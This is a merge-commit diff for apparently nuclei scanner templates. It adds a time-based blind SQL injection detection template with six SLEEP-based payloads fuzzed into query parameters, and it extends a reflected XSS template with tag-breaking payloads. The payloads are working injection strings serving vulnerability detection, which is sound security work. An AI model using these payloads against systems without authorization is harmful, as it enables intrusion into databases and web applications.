Merge pull request #9695 from 0xKayala/main

Updated Reflected XSS, Added Blind XSS and Time based SQLi
2024-06-15 10:24:25 +04:00 · 2024-06-15 10:24:25 +04:00 · fd7e00b5ec
parent 55aa46ad95 54142c9eb1
commit fd7e00b5ec
2 changed files with 54 additions and 4 deletions
--- a/dast/vulnerabilities/sqli/time-based-sqli.yaml
+++ b/dast/vulnerabilities/sqli/time-based-sqli.yaml
@ -0,0 +1,49 @@
+id: time-based-sqli
+
+info:
+  name: Time-Based Blind SQL Injection
+  author: 0xKayala
+  severity: critical
+  description: |
+    This Template detects time-based Blind SQL Injection vulnerability
+  tags: sqli,dast,time-based,blind
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration<=7"
+
+  - raw:
+      - |
+        @timeout: 20s
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    payloads:
+      injection:
+        - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
+        - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
+        - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
+        - "if(now()=sysdate(),SLEEP(7),0)"
+        - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
+        - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration>=7 && duration <=16"
--- a/dast/vulnerabilities/xss/reflected-xss.yaml
+++ b/dast/vulnerabilities/xss/reflected-xss.yaml
@ -1,8 +1,8 @@
 id: reflected-xss

 info:
-  name: Reflected Cross Site Scripting
-  author: pdteam
+  name: Reflected Cross-Site Scripting
+  author: pdteam,0xKayala
  severity: medium
  metadata:
    max-request: 1
@ -19,7 +19,9 @@ http:

    payloads:
      reflection:
-        - "'\"><{{first}}"
+        - "'\"><{{first}}>"
+        - "'><{{first}}>"
+        - "\"><{{first}}>"

    fuzzing:
      - part: query
@ -40,4 +42,3 @@ http:
        part: header
        words:
          - "text/html"
-# digest: 4a0a0047304502205821d73014fc8d11f73cd6310b813fe726e0a079b64f64e68b4ec264862ca17e0221008b5588348307f431509fb585b4920dc44a9de1f9330154b012be8dc4520fd47d:922c64590222798bb761d5b6d8e72950